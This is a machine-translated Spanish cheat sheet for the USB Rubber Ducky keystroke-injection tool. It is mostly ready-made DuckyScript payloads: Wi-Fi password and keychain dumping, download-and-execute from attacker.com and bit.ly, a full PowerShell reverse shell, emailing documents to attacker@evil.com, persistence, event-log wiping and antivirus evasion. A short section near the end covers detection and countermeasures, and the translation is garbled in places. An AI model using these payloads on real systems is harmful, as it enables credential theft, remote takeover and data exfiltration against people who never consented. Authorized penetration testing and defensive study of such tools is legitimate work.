USB Rubber Ducky Keystroke Herramienta de inyección

"Clase de la hoja"

########################################################################################################################################################################################################################################################## Copiar todos los comandos

########################################################################################################################################################################################################################################################## Generar PDF seleccionado/button

■/div titulada

Sinopsis

El USB Rubber Ducky es una herramienta de inyección de keystroke disfrazada como una unidad flash genérica. Creado por Hak5, aparece como un teclado para el ordenador objetivo y puede ejecutar secuencias de teclado preprogramadas a velocidades superhumanas. Se utiliza comúnmente para pruebas de penetración, evaluaciones de ingeniería social y demostraciones de seguridad.

NOVEDAD Advertencia: Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y evaluaciones de seguridad. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.

Resúmenes de hardware

USB Rubber Ducky Especificaciones

• Procesador: 60 MHz Procesador de 32 bits
• ** Restauración**: Tarjeta microSD (hasta 32 GB)
• ** Interfaz**: USB 2.0
• Hablado: 1000 palabras por minuto tasa de inyección
• Compatibilidad: Windows, Mac, Linux, Android
• Power: Autobús a través de USB

Componentes requeridos

• USB Rubber Ducky device
• Tarjeta microSD (formateada como FAT o FAT32)
• Computación con acceso a Internet para el desarrollo de carga útil
• Equipo de destino con puerto USB

Configuración y configuración

Configuración inicial

# Format MicroSD card
# Windows: Use Disk Management or format command
format F: /FS:FAT32 /Q

# Linux: Use fdisk and mkfs
sudo fdisk /dev/sdX
sudo mkfs.fat -F32 /dev/sdX1

# macOS: Use Disk Utility or diskutil
diskutil eraseDisk FAT32 DUCKY /dev/diskX

Actualizaciones de firmware

# Download latest firmware from Hak5
# Flash firmware using DFU mode
# Hold button while plugging in to enter DFU mode

# Linux firmware flashing
sudo dfu-util -D firmware.bin

# Windows firmware flashing (use Hak5 Flash tool)
# Follow Hak5 documentation for firmware updates

Estructura de archivo

MicroSD Card Structure:
├── inject.bin (compiled payload)
├── config.txt (optional configuration)
└── payloads/ (source payload files)

DockyScript Language

Sintaxis básica

REM This is a comment
DELAY 1000
STRING Hello World
ENTER

Comandos básicos

Command	Description	Example
REM	Comment line	REM This is a comment
DELAY	Pause execution (ms)	DELAY 1000
STRING	Type text string	STRING Hello World
ENTER	Press Enter key	ENTER
TAB	Press Tab key	TAB
ESCAPE	Press Escape key	ESCAPE
SPACE	Press Space key	SPACE
REPEAT	Repeat last command	REPEAT 5

Llaves Modificadoras

Command	Description
CTRL or CONTROL	Control key
ALT	Alt key
SHIFT	Shift key
GUI or WINDOWS	Windows/Cmd key
MENU or APP	Menu/Application key

Combinaciones clave

REM Ctrl+C (Copy)
CTRL c

REM Ctrl+Alt+Delete
CTRL ALT DELETE

REM Windows+R (Run dialog)
GUI r

REM Alt+Tab (Switch windows)
ALT TAB

REM Ctrl+Shift+Esc (Task Manager)
CTRL SHIFT ESCAPE

Payload Development

Estructura básica de carga

REM Author: Security Tester
REM Description: Basic Windows enumeration
REM Target: Windows 10/11

DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING whoami && hostname && ipconfig
ENTER
DELAY 2000
STRING exit
ENTER

Windows Payloads

Reunión de información del sistema

REM Windows System Information
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Get-ComputerInfo|Out-File C:\temp\sysinfo.txt
ENTER
DELAY 2000
STRING Get-Process|Out-File C:\temp\processes.txt -Append
ENTER
DELAY 2000
STRING Get-Service|Out-File C:\temp\services.txt -Append
ENTER
DELAY 2000
STRING exit
ENTER

Reconocimiento de redes

REM Network Information Gathering
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING ipconfig /all > C:\temp\network.txt
ENTER
DELAY 1000
STRING netstat -an >> C:\temp\network.txt
ENTER
DELAY 1000
STRING arp -a >> C:\temp\network.txt
ENTER
DELAY 1000
STRING route print >> C:\temp\network.txt
ENTER
DELAY 1000
STRING exit
ENTER

Cosecha temporal

REM WiFi Password Extraction
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING netsh wlan show profiles
ENTER
DELAY 2000
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j|findstr -i -v echo|netsh wlan show profiles %j key=clear
ENTER
DELAY 5000
STRING exit
ENTER

Persistence Mechanisms

REM Registry Persistence
DELAY 2000
GUI r
DELAY 500
STRING regedit
ENTER
DELAY 2000
CTRL f
DELAY 500
STRING HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ENTER
DELAY 1000
ALT F4
DELAY 500
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\System32\calc.exe"
ENTER
DELAY 1000
STRING exit
ENTER

macOS Payloads

Información del sistema

REM macOS System Information
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING system_profiler SPHardwareDataType > ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING ps aux >> ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING netstat -an >> ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING exit
ENTER

Acceso a llavero

REM macOS Keychain Dump
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING security dump-keychain -d login.keychain > ~/Desktop/keychain.txt 2>&1
ENTER
DELAY 5000
STRING exit
ENTER

Linux Payloads

Enumeración del sistema

REM Linux System Enumeration
DELAY 2000
CTRL ALT t
DELAY 1000
STRING uname -a > /tmp/sysinfo.txt
ENTER
DELAY 500
STRING cat /etc/passwd >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING ps aux >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING netstat -tulpn >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING exit
ENTER

Escalada de Privilege Check

REM Linux Privilege Escalation Check
DELAY 2000
CTRL ALT t
DELAY 1000
STRING sudo -l > /tmp/privesc.txt
ENTER
DELAY 1000
STRING find / -perm -4000 2>/dev/null >> /tmp/privesc.txt
ENTER
DELAY 2000
STRING crontab -l >> /tmp/privesc.txt
ENTER
DELAY 1000
STRING exit
ENTER

Carga avanzada

Carga de pago multietapa

REM Multi-stage payload with download
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/stage2.ps1')
ENTER
DELAY 5000
STRING exit
ENTER

Carga de Shell inversa

REM PowerShell Reverse Shell
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%\\\\{0\\\\};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\\\\{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1|Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()\\\\};$client.Close()
ENTER

Exfiltración de datos

REM Data Exfiltration via Email
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $files = Get-ChildItem C:\Users\$env:USERNAME\Documents -Recurse -Include *.txt,*.doc,*.pdf|Select-Object -First 10
ENTER
DELAY 1000
STRING foreach($file in $files) \\\\{ $content = Get-Content $file.FullName -Raw; Send-MailMessage -To "attacker@evil.com" -From "victim@company.com" -Subject $file.Name -Body $content -SmtpServer "smtp.company.com" \\\\}
ENTER
DELAY 5000
STRING exit
ENTER

Anti-Forenseics

REM Clear Event Logs
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Get-EventLog -List|ForEach-Object \\\\{ Clear-EventLog $_.Log \\\\}
ENTER
DELAY 2000
STRING Remove-Item $env:TEMP\* -Recurse -Force
ENTER
DELAY 2000
STRING exit
ENTER

Compilación de carga útil

Usando DuckEncoder

# Download DuckEncoder
git clone https://github.com/hak5darren/USB-Rubber-Ducky.git
cd USB-Rubber-Ducky

# Compile payload
java -jar Encoder/encoder.jar -i payload.txt -o inject.bin

# Alternative online encoder
# Visit: https://ducktoolkit.com/encoder

Utilizando Duck Toolkit

# Online compilation at ducktoolkit.com
# 1. Paste DuckyScript code
# 2. Select keyboard layout
# 3. Click "Encode Payload"
# 4. Download inject.bin file

Tejidos de teclado

# Common keyboard layouts
us          # US English
uk          # UK English
de          # German
fr          # French
es          # Spanish
it          # Italian
pt          # Portuguese
ru          # Russian

Estrategias de despliegue

Escenarios de acceso físico

REM Quick deployment (30 seconds)
DELAY 2000
GUI r
DELAY 500
STRING cmd /c "powershell IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/payload')"
ENTER

Integración de Ingeniería Social

REM Disguised as software update
DELAY 3000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING Dear User,
ENTER
STRING
ENTER
STRING A critical security update is being installed.
ENTER
STRING Please do not remove this device until complete.
ENTER
STRING
ENTER
STRING Estimated time: 2-3 minutes
ENTER
DELAY 2000
ALT F4
DELAY 500
REM Execute actual payload here

Persistence Payloads

REM Scheduled Task Persistence
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING schtasks /create /tn "SecurityUpdate" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Windows\Temp\update.ps1" /sc daily /st 09:00
ENTER
DELAY 1000
STRING exit
ENTER

Técnicas de evacuación

Evasión antiVirus

REM Obfuscated PowerShell
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -EncodedCommand <base64_encoded_command>
ENTER

Evasión basada en el tiempo

REM Random delays to avoid detection
DELAY 3000
GUI r
DELAY 800
STRING cmd
ENTER
DELAY 1200
STRING echo "Normal user activity"
ENTER
DELAY 2500
REM Execute payload with human-like timing

Contratación de procesos

REM Hide PowerShell window
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -NoProfile -NonInteractive
ENTER
DELAY 1000
STRING Start-Process powershell -ArgumentList "-WindowStyle Hidden -Command 'Your-Command-Here'" -WindowStyle Hidden
ENTER

Medidas defensivas y detección

USB Supervisión de dispositivos

# Monitor USB device insertions
Get-WinEvent -FilterHashtable @\\\\{LogName='System'; ID=20001,20003\\\\}|
Where-Object \\\\{$_.Message -like "*USB*"\\\\}

# Registry monitoring for USB devices
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\*"|
Select-Object FriendlyName, Mfg, Service

Detección de inyección de Keystroke

# Monitor for rapid keystroke patterns
# Look for superhuman typing speeds in logs
Get-WinEvent -FilterHashtable @\\\\{LogName='Security'; ID=4648,4624\\\\}|
Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-5)\\\\}

# Monitor for suspicious command patterns
Get-WinEvent -FilterHashtable @\\\\{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104\\\\}|
Where-Object \\\\{$_.Message -like "*DownloadString*" -or $_.Message -like "*IEX*"\\\\}

USB Restricciones portuarias

REM Disable USB storage devices via Group Policy
REM Computer Configuration > Administrative Templates > System > Removable Storage Access

REM Registry method to disable USB storage
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f

Contramedidas

Endpoint Protection

# Enable PowerShell logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1

# Enable command line auditing
auditpol /set /subcategory:"Process Creation" /success:enable

# Monitor for suspicious processes
Get-Process|Where-Object \\\\{$_.ProcessName -like "*powershell*" -and $_.MainWindowTitle -eq ""\\\\}

Network Monitoring

# Monitor for suspicious network connections
netstat -an|grep ESTABLISHED|grep -E "(4444|8080|443)"

# DNS monitoring for suspicious domains
# Monitor DNS logs for newly registered domains or suspicious TLDs

Educación del usuario

Key indicators of USB Rubber Ducky attacks:
1. Unexpected keyboard activity
2. Rapid text entry beyond human capability
3. Command prompts appearing automatically
4. Suspicious network activity after USB insertion
5. New scheduled tasks or startup programs

Técnicas avanzadas

Cadena de carga

REM Stage 1: Initial access
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Invoke-WebRequest -Uri "http://attacker.com/stage2.txt" -OutFile "$env:TEMP\s2.txt"
ENTER
DELAY 3000
STRING Get-Content "$env:TEMP\s2.txt"|Invoke-Expression
ENTER
DELAY 1000
STRING exit
ENTER

Environment Detection

REM Detect virtualized environment
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING if ((Get-WmiObject -Class Win32_ComputerSystem).Model -notlike "*Virtual*") \\\\{ Your-Payload-Here \\\\}
ENTER
DELAY 2000
STRING exit
ENTER

Ejecución condicional

REM Execute only on specific OS version
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING if ([Environment]::OSVersion.Version.Major -eq 10) \\\\{ Your-Windows10-Payload \\\\}
ENTER
DELAY 2000
STRING exit
ENTER

Solución de problemas

Cuestiones comunes

Issue: Payload not executing
Solution: Check keyboard layout, verify inject.bin file

Issue: Commands typing incorrectly
Solution: Verify keyboard layout matches target system

Issue: Timing issues
Solution: Increase DELAY values for slower systems

Issue: Antivirus detection
Solution: Use obfuscation techniques, test on similar AV

Debugging Payloads

REM Debug payload with visible output
DELAY 2000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING Payload executed successfully
ENTER
STRING Current user:
STRING %USERNAME%
ENTER
STRING Current time:
STRING %TIME%
ENTER

Testing Environment

# Set up isolated testing environment
# Use virtual machines for payload development
# Test on multiple OS versions and configurations
# Verify payload behavior before deployment

Consideraciones jurídicas y éticas

Uso autorizado

• Obtenga el permiso escrito antes de la prueba
• Uso sólo en entornos controlados
• Documentar todas las actividades de prueba
• Seguir las prácticas de divulgación responsables

Requisitos de cumplimiento

• Garantizar el cumplimiento de las leyes locales
• Seguir las políticas de seguridad institucional
• Mantener la cadena de custodia para pruebas
• Proteger información confidencial descubierta

Recursos

• Hak5 USB Rubber Ducky
• DuckyScript Documentation
• Duck Toolkit
• Repositorio de carga
• Foros de Hak5

-...

*Esta hoja de trampolín proporciona una referencia completa para el uso del muelle de goma USB. Siempre asegúrese de tener una autorización adecuada antes de realizar evaluaciones de seguridad física. *